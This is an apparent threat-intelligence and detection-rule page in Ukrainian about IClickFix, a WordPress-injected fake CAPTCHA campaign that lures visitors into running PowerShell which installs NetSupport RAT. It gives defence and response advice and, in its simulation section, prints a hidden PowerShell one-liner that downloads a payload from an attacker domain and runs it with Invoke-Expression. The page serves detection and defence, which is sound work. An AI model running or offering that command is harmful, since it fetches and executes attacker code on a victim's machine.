Знайомтесь з IClickFix: Широковживана структура для атак на WordPress, що використовує тактику ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
У звіті описано IClickFix, зловмисний JavaScript-фреймворк, який компрометує сайти WordPress і представляє підроблений CAPTCHA в стилі Cloudflare Turnstile. Приманка змушує відвідувачів виконати команду PowerShell, яка завантажує та встановлює NetSupport RAT. Доставка підтримується системою розподілу трафіку, побудованою навколо скорочувача URL YOURLS і набору ротаційних доменів-переходів. Дослідники виявили понад 3800 компрометованих сайтів WordPress, які обслуговують цей ланцюг глобально з кінця 2024 року.
Розслідування
Аналітики Sekoia ідентифікували впроваджений JavaScript-тег ic-tracker-js на компрометованих сайтах, а потім відновили потік переадресації через кілька короткочасних доменів. Вони захопили точну модель виконання PowerShell, що використовувалася для отримання кінцевого навантаження і відновили скинуті компоненти NetSupport RAT разом із відповідними індикаторами інфраструктури C2.
Захист
Контролюйте веб-контент на предмет ic-tracker-js інєкцій та блокуйте відомі зловмисні домени, ре-даректори й сервіси коротких посилань, які використовуються в ланцюзі. На кінцевих точках знайдіть шаблони завантаження та виконання PowerShell, що збігаються з приманкою ClickFix. Додайте покриття для створення файлів клієнта NetSupport і стійкість через користувацькі Run ключі реєстру.
Відповідь
Коли з’являються індикатори, ізолюйте кінцеву точку, зупиніть активний процес PowerShell і видаліть бінарні файли NetSupport разом із будь-якою стійкістю на основі реєстру. Далі проведіть повний судовий аналіз, щоб підтвердити, що атакуючий не розгорнув додаткові імпланти або не встановив вторинні шляхи доступу.
Потік атаки
Виявлення
Завантаження або завантаження через Powershell (через cmdline)
Перегляд
Підозрілі файли в загальному профілі користувача (через file_event)
Перегляд
Можливість виконання через приховані командні рядки PowerShell (через cmdline)
Перегляд
Підозріле використання Invoke-RestMethod (через powershell)
Перегляд
Можлива спроба виконання бінарного файлу NetSupport Manager з підозрілого каталогу (через process_creation)
Перегляд
Можливі точки стійкості [ASEPs – Software/NTUSER Hive] (через registry_event)
Перегляд
IOC (HashSha256) для виявлення: Зустрічайте IClickFix: широко поширений фреймворк, націлений на WordPress, використовує тактику ClickFix
Перегляд
IOC (DestinationIP) для виявлення: Зустрічайте IClickFix: широко поширений фреймворк, націлений на WordPress, використовує тактику ClickFix
Перегляд
IOC (SourceIP) для виявлення: Зустрічайте IClickFix: широко поширений фреймворк, націлений на WordPress, використовує тактику ClickFix
Перегляд
Виявлення ін’єкції шкідливого JavaScript IClickFix [Вебсервер]
Перегляд
Виконання команд PowerShell для доставки NetSupport RAT [Windows Powershell]
Перегляд
Імітаційне виконання
Необхідна умова: Перевірка телеметрії й попереднього завантаження базових даних повинна пройдено.
-
Оповідь про атаку та команди:
Противник, що отримав початковий доступ до кінцевої точки, хоче встановити постійний доступ шляхом доставки NetSupport RAT. Щоб уникнути інтерактивного виявлення, вони запускають PowerShell у прихованому режимі без профілю або логотипу (
-w hidden -nop -c). Потім вони використовуютьInvoke-WebRequest(iwr) для завантаження шкідливого JSON-навантаження (tytuy.json), який містить сценарій PowerShell для RAT. Сценарій записується до тимчасового каталогу і виконується черезInvoke-Expression. Ця точна командна лінія відповідає рядкам, які моніторить правило Sigma. -
Тестовий сценарій рецидиву:
# PowerShell однолінійний сценарій, який відповідає правилу виявлення $url = 'https://scottvmorton.com/tytuy.json' $out = "$env:TEMPpayload.ps1" powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)" -
Команди очищення:
# Видалити завантажене навантаження та будь-які залишкові процеси PowerShell Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force